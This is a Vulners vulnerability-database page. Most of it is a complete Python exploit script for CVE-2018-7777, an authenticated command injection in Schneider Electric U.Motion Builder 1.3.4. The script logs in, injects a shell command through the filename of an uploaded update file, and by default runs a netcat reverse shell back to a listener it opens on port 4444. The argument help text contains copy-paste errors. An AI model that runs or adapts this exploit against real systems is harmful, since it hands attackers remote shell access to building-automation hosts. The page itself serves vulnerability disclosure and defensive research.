Vulners
Lucene search
Schneider Electric U.Motion Builder 1.3.4 Command Injection
🗓️ 03 Feb 2020 00:00:00Reported by Cosmin CraciunType 
packetstorm🔗 packetstormsecurity.com👁 197 Views
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | Schneider Electric U.Motion Builder 1.3.4 - Authenticated Command Injection Exploit | 3 Feb 202000:00 | – | zdt |
 | Schneider Electric U.motion Builder Remote Code Execution Vulnerability (CNVD-2018-07816) | 13 Apr 201800:00 | – | cnvd |
 | CVE-2018-7777 | 3 Jul 201814:00 | – | cve |
 | CVE-2018-7777 | 3 Jul 201814:00 | – | cvelist |
 | Schneider Electric U.Motion Builder 1.3.4 - Authenticated Command Injection | 3 Feb 202000:00 | – | exploitdb |
 | EUVD-2018-19489 | 7 Oct 202500:30 | – | euvd |
 | Schneider Electric U.Motion Builder 1.3.4 - Authenticated Command Injection | 3 Feb 202000:00 | – | exploitpack |
 | CVE-2018-7777 | 3 Jul 201814:29 | – | nvd |
 | Design/Logic Flaw | 3 Jul 201814:29 | – | prion |
`# Exploit Title: Schneider Electric U.Motion Builder 1.3.4 - Authenticated Command Injection
# Date: 2018-08-01
# Exploit Author: Cosmin Craciun
# Vendor Homepage: https://www.se.com
# Version: <= 1.3.4
# Tested on: Delivered Virtual Appliance running on Windows 10 x64
# CVE : CVE-2018-7777
# References: https://github.com/cosmin91ro
#!/usr/bin/oython
from __future__ import print_function
import httplib
import urllib
import argparse
import re
import sys
import socket
import threading
import time
parser = argparse.ArgumentParser(description='PoC')
parser.add_argument('--target', help='IP or hostname of target', required=True)
parser.add_argument('--port', help='TCP port the target app is running', required=True, default='8080')
parser.add_argument('--username', help='TCP port the target app is running', required=True, default='admin')
parser.add_argument('--password', help='TCP port the target app is running', required=True, default='admin')
parser.add_argument('--command', help='malicious command to run', default='shell')
parser.add_argument('--src_ip', help='IP of listener for the reverse shell', required=True)
parser.add_argument('--timeout', help='time in seconds to wait for a response', type=int, default=3)
class Exploiter(threading.Thread):
def __init__ (self, target, port, timeout, uri, body, headers, shell_mode):
threading.Thread.__init__(self)
self.target = target
self.port = port
self.timeout = timeout
self.uri = uri
self.body = body
self.headers = headers
self.shell_mode = shell_mode
def send_exploit(self, target, port, timeout, uri, body, headers):
print('Sending exploit ...')
conn = httplib.HTTPConnection("{0}:{1}".format(target, port), timeout=timeout)
conn.request("POST", uri, body, headers)
print("Exploit sent")
if not self.shell_mode: print("Getting response ...")
try:
response = conn.getresponse()
if not self.shell_mode: print(str(response.status) + " " + response.reason)
data = response.read()
if not self.shell_mode: print('Response: {0}\r\nCheck the exploit result'.format(data))
except socket.timeout:
if not self.shell_mode: print("Connection timeout while waiting response from the target.\r\nCheck the exploit result")
def run(self):
self.send_exploit(self.target, self.port, self.timeout, self.uri, self.body, self.headers)
class Listener(threading.Thread):
def __init__(self, src_ip):
threading.Thread.__init__(self)
self.src_ip = src_ip
def run(self):
self.listen(self.src_ip)
def listen(self, src_ip):
TCP_IP = src_ip
TCP_PORT = 4444
BUFFER_SIZE = 1024
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((TCP_IP, TCP_PORT))
print("Listener open on port {0}".format(TCP_PORT))
s.listen(1)
conn, addr = s.accept()
print('Exploited: ' + str(addr))
while 1:
comm = raw_input("shell$ ").strip()
if comm == "quit":
conn.close()
sys.exit(0)
if comm != "":
conn.send(comm + " 2>&1" + "\x0a")
while 1:
data = conn.recv(BUFFER_SIZE)
if not data: break
print(data, end="")
if "\x0a" in data: break
except Exception as ex:
print("Could not start listener")
print(ex)
def login(target, port, username, password):
uri = "http://{0}:{1}/umotion/modules/system/user_login.php".format(target, port)
params = urllib.urlencode({
'username': username,
'password': password,
'rememberMe': '1',
'context': 'configuration',
'op': 'login'
})
headers = {
"Content-type": "application/x-www-form-urlencoded; charset=UTF-8",
"Accept": "*/*"
}
try:
conn = httplib.HTTPConnection("{0}:{1}".format(target, port))
conn.request("POST", uri, params, headers)
response = conn.getresponse()
print(str(response.status) + " " + response.reason)
data = response.read()
except socket.timeout:
print("Connection timeout while logging in. Check if the server is available")
return
cookie = response.getheader("Set-Cookie")
#print(cookie)
r = re.match(r'PHPSESSID=(.{26});.*loginSeed=(.{32})', cookie)
if r is None:
print("Regex not match, could not get cookies")
return
if len(r.groups()) < 2:
print("Error while getting cookies")
return
sessid = r.groups()[0]
login_seed = r.groups()[1]
return sessid, login_seed
conn.close()
def encode_multipart_formdata(fields, files):
LIMIT = '----------lImIt_of_THE_fIle_eW_$'
CRLF = '\r\n'
L = []
for (key, value) in fields:
L.append('--' + LIMIT)
L.append('Content-Disposition: form-data; name="%s"' % key)
L.append('')
L.append(value)
for (key, filename, value) in files:
L.append('--' + LIMIT)
L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename))
L.append('Content-Type: application/x-gzip')
L.append('')
L.append(value)
L.append('--' + LIMIT + '--')
L.append('')
body = CRLF.join(L)
content_type = 'multipart/form-data; boundary=%s' % LIMIT
return content_type, body
def exploit(target, port, username, password, command, timeout):
uri = "http://{0}:{1}/umotion/modules/system/update_module.php".format(target, port)
fields = [
('choose_update_mode', 'MANUAL'),
('add_button', '0'),
('format', 'json'),
('step', '2'),
('next', '1'),
('name_update_file', ''),
('path_update_file', ''),
('type_update_file', '')
]
listener = None
if command == "shell":
shell_mode = True
command = "nc -e $SHELL {0} 4444".format(args.src_ip)
listener = Listener(args.src_ip)
listener.start()
time.sleep(3)
else:
shell_mode = False
files = [
('update_file', 'my;{0};file.tar.gz'.format(command), "\x1f\x8b")
]
content_type, body = encode_multipart_formdata(fields, files)
if not shell_mode or (shell_mode and listener and listener.isAlive()):
print('Logging in ...')
sess_id, login_seed = login(target, port, username, password)
if sess_id is None or login_seed is None:
print('Error while logging in')
return
print('Logged in ! ')
headers = {
'Accept': 'application/json,text/javascript,*/*; q=0.01',
'Accept-Encoding': 'gzip,deflate',
'Referer': 'http://{0}:{1}/umotion/modules/system/externalframe.php?context=configuration'.format(target, port),
'X-Requested-With': 'XMLHttpRequest',
'Content-Length': len(body),
'Content-Type': content_type,
'Connection': 'keep-alive',
'Cookie': 'PHPSESSID={0}; loginSeed={1}'.format(sess_id, login_seed)
}
exploiter = Exploiter(target, port, timeout, uri, body, headers, shell_mode)
exploiter.start()
if __name__ == '__main__':
args = parser.parse_args()
exploit(args.target, args.port, args.username, args.password, args.command, args.timeout)
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Feb 2020 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.15807